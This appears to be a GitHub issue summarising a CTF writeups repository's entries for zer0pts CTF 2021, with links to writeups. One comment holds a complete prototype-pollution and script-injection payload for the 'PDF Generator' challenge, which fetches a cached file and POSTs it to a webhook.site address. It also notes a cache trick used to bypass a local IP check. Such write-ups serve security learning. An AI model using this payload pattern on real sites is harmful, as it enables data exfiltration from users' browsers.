search

aszx87410 / ctf-writeups

ctf writeups
62 stars 9 forks source link

zer0pts CTF 2021 - Summary #24

Open aszx87410 opened 3 years ago

aszx87410 commented 3 years ago

Writeups

  1. zer0pts CTF 2021 - Simple Blog 23 solves
  2. zer0pts CTF 2021 - Kantan Calc 50 solves
  3. zer0pts CTF 2021 - PDF Generator(unintended) 18 solves
aszx87410 commented 3 years ago

not pdf unintended from parrot

https://notpdfgen.ctf.zer0pts.com:8443/?sdf[constructor][prototype][title]=2&sdf[constructor][prototype][template][nodeType]=2&sdf[constructor][prototype][template][innerHTML]=<div id="app"><h3>{{title}}</h3><embed src="/9ab76d233b52165bf9450f81d0784425" type="application/pdf"><iframe srcdoc="<script>setTimeout(()=>{fetch('/9ab76d233b52165bf9450f81d0784425',{'cache':'force-cache'}).then((r)=>r.blob()).then((r)=>{
var reader = new FileReader();
 reader.readAsDataURL(r); 
 reader.onloadend = function() {
     var base64data = reader.result;                
     fetch(`https://webhook.site/QQ`,{method:`POST`,body:base64data});}
})},1000);</script>"></iframe></div>

use 'cache':'force-cache' to bypass local ip check, brilliant!

aszx87410 commented 3 years ago

All official writeup: https://hackmd.io/@ptr-yudai/B1bk04fmu